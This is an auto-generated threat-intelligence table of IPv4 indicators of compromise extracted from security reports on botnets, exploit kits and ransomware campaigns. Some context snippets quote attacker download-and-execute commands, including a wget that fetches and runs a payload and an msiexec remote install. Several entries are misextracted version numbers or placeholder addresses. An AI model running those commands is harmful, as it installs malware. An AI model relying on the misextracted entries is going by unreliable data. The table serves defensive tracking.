Indicators of compromise
186 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| ipv4 | 185.196.220.85 | riginated from the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 | Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News | · 11d ago |
| ipv4 | 189.4.122.140 | 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 Th | Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News | · 11d ago |
| ipv4 | 216.126.225.208 | :fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 | Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News | · 11d ago |
| ipv4 | 37.9.33.62 | 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on July 14, 20 | Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News | · 11d ago |
| ipv4 | 64.176.209.104 | 178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said t | Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News | · 11d ago |
| ipv4 | 162.55.0.0 | an Hetzner’s normal announcement of the surrounding block ( 162.55.0.0/16 ), so under standard BGP route selection it took precede | Security Incident – BGP Hijacking Lobsters · security | · 12d ago |
| ipv4 | 162.55.80.0 | TC , a block of IP addresses used by Softaculous services ( 162.55.80.0/24 , part of our infrastructure at Hetzner) was affected by | Security Incident – BGP Hijacking Lobsters · security | · 12d ago |
| ipv4 | 3.2.9.9 | anches. The incident advisory names the release Virtualizor 3.2.9.9 , while the release note calls it Virtualizor 3.2.9 (Releas | BGP Hijack Delivers Malicious Virtualizor Update That Establishes Persistent Root Access The Hacker News | · 13d ago |
| ipv4 | 176.65.148.184 | include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across mu | Exploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586) Help Net Security | · 13d ago |
| ipv4 | 185.254.222.105 | ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 ( | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 14d ago |
| ipv4 | 176.65.148.184 | pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoin | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 14d ago |
| ipv4 | 8.2.2.1 | release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). Organizations | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 14d ago |
| ipv4 | 8.4.0.2 | goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency reg | CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability Horizon3.ai | · 14d ago |
| ipv4 | 132.223.202.213 | like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12. | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| ipv4 | 159.89.156.190 | DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; / | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| ipv4 | 165.227.78.159 | > < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / > | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| ipv4 | 194.187.209.4 | like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapen | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 27d ago |
| ipv4 | 199.247.6.253 | ct ( ^ "Wscript.Shell^" ) : v . Run ^ "msiexec /q /i http://199.247.6.253/ud^" , false , 0 < nul > C : \ Windows \ System32 \ spool \ | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · 29d ago |
| ipv4 | 89.46.222.97 | 90fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47 | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · 29d ago |
| ipv4 | 119.104.111.97 | C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating each | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · 29d ago |
| ipv4 | 1.2.3.4 | ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 server | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · 29d ago |
| ipv4 | 46.166.165.254 | nloader which is used to call out to a server with the IP ' 46.166.165.254 ' and download the main Rover malware along with plugins us | New Malware 'Rover' Targets Indian Ambassador to Afghanistan Palo Alto Unit 42 | · 29d ago |
| ipv4 | 111.111.111.111 | ping.exe" ) and action_process_image_command_line contains "111.111.111.111 -n 5 -w 10" | fields _time , agent_hostname , actor_effecti | Threat Brief: Ongoing Russia and Ukraine Cyber Activity Palo Alto Unit 42 | · 29d ago |
| ipv4 | 172.104.31.117 | iginated from the following IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ip | Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022 Palo Alto Unit 42 | · 29d ago |
| ipv4 | 191.37.248.120 | llowing IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ip | Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022 Palo Alto Unit 42 | · 29d ago |
| ipv4 | 84.17.48.94 | : IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ipv4 18.221.234.103 | Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022 Palo Alto Unit 42 | · 29d ago |
| ipv4 | 1.2.3.4 | -browswer. DNS lookup is redirected and goes to a the wrong 1.2.3.4 ip address. As long as that IP address has a security cert, | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · 29d ago |
| ipv4 | 8.8.8.8 | in LA, what should I do – edit my android hosts file to use 8.8.8.8 to get DNS? Aim my browser at the IP address of my hosting | Hacking Public Wi-Fi DNS to Steal Credentials Schneier on Security | · 29d ago |
| ipv4 | 185.159.130.89 | 6.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 35.163.101.72 | 219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 3 | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 35.165.251.24 | 2 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165. | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 35.165.251.241 | .251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.161 suzemodels[.]top - 35.163.10 | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 35.165.86.173 | IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.1 | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 46.173.219.161 | hows each domain followed by its IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163. | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 62.109.29.26 | ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.1 | "Blank Slate" Campaign Takes Advantage of Hosting Providers to Spread Ransomware Palo Alto Unit 42 | · 29d ago |
| ipv4 | 149.202.109.205 | Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 2016-03-15 Nuclear | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 46.101.8.169 | Gate domain: sed.poudelkamal.com.np Nuclear EK IP address: 46.101.8.169 Nuclear EK domains: lotos.castrumtelcom.com.br , here.jninm | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 46.148.20.32 | r , here.jninmobilaria.com.ar Follow-up malware IP address: 46.148.20.32 Follow-up malware domain: js.cefora.com.ar IP addresses fro | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 51.254.181.122 | ses from post-infection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malw | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 51.255.107.8 | nfection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: De | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 78.40.108.39 | fic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 20 | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 91.195.12.177 | Date/time range: 2016-03-15 and 2016-03-16 Gate IP address: 91.195.12.177 Gate domain: sed.poudelkamal.com.np Nuclear EK IP address: | Locky Ransomware Installed Through Nuclear EK Palo Alto Unit 42 | · 29d ago |
| ipv4 | 104.129.198.32 | r their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 194.165.16.202 | 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016- | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 194.165.16.203 | 6-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016- | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 194.165.16.204 | 8-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016- | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 31.184.192.188 | 9-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 31.184.193.168 | 9-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 31.184.193.187 | 9-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.110 | 3 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016- | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.12 | 1 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.13 | 2 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09- | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.32 | ly reappeared well after their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-1 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.33 | 15-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.34 | 16-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.43 | 8 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.68 | 2 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.72 | 4 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.93.0.81 | 3 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · 29d ago |
| ipv4 | 104.193.252.236 | hechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthi | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 104.193.252.241 | litigators.esteroscreen[.]com Bedep post-infection traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 162.244.34.11 | eroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - all | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.118.164.42 | the Afraidgate campaign are shown below. Figure 3: Gate on 185.118.164.42 leads to Angler EK/Bedep/CryptXXX on Friday 2016-04-22. Fig | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 192.169.189.167 | ]org 85.25.160.124 port 80 - mcimaildmz.dinnerplate.co[.]uk 192.169.189.167 port 80 - candidulumbestuurlijk.newlandsierrarealestate[.]c | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 192.169.190.97 | rt 80 - candidulumbestuurlijk.newlandsierrarealestate[.]com 192.169.190.97 port 80 - frageboegen-plletyksin.breastcanceroutreach[.]com | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 207.182.148.92 | bloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - o | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 209.126.120.8 | .97 port 80 - reikleivn-azarashi.orlandohomesbydevito[.]com 209.126.120.8 port 80 - litigators.esteroscreen[.]com Bedep post-infectio | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 217.23.6.40 | mjobrkn3[.]eu (using a VM) CryptXXX post-infection traffic: 217.23.6.40 port 443 (custom encoding) | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 5.199.141.203 | yfczmludodohkdqnij[.]com (using a VM) Click-fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - ceti | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.25.160.124 | et.jacquieleebrasil.com[.]br - GET /js/script.js Angler EK: 85.25.160.124 port 80 - bintiye.helpthevets[.]org 85.25.160.124 port 80 - | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 85.25.79.211 | ici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oqpwldjc.mjobrkn3[.]eu (using a VM) CryptXXX post | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 93.190.141.27 | fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - ted | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 95.211.205.218 | rdinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rero | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 95.211.205.228 | traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - yfczmludodohkdqnij[.]com (using a VM) Click-fraud | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.117.153.176 | 50.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.117.153.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.118.66.83 | .176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.118.66.83 port 80 - 185.118.66.83 - POST /upload/_dispatch.php Domain | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.140.33.76 | ored[.]top 5.2.72.236 port 80 - yegoxmvzpx.bsuperpink[.]top 185.140.33.76 port 80 - erfxsnvj.mafterred[.]top 185.140.33.76 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.140.33.99 | rred[.]top 185.140.33.76 port 80 - hxmst.rautumngreen[.]top 185.140.33.99 port 80 - bkhrdfngwg.blueelizabeth[.]top 185.140.33.99 port | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 185.5.250.135 | 54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.250.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.11 | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 188.166.38.125 | 1 port 80 - start.puterasyawal[.]com - GET /js/addOnLoad.js 188.166.38.125 port 80 - nepal.laderatutors[.]com - GET /rokmediaqueries.j | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 46.101.26.161 | compromise associated with the Afraidgate campaign: Gates: 46.101.26.161 port 80 - leon.stmaryschooldmt[.]com - GET /scripts/jquery. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 5.187.0.137 | .253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.5 | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 5.2.72.114 | .yintored[.]top 5.2.72.236 port 80 - bkubf.bsuperpink[.]top 5.2.72.114 port 80 - iynwzttqd.hautumngreen[.]top 5.2.72.236 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 5.2.72.236 | zine.polatoglumimarlik[.]com - GET /to_top.js Neutrino EK: 5.2.72.236 port 80 - avukytj.oautumnyellow[.]top 5.2.72.236 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 5.9.253.173 | rklfdprel.blueelizabeth[.]top Locky post-infection traffic: 5.9.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
| ipv4 | 77.222.54.202 | 87.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · 29d ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.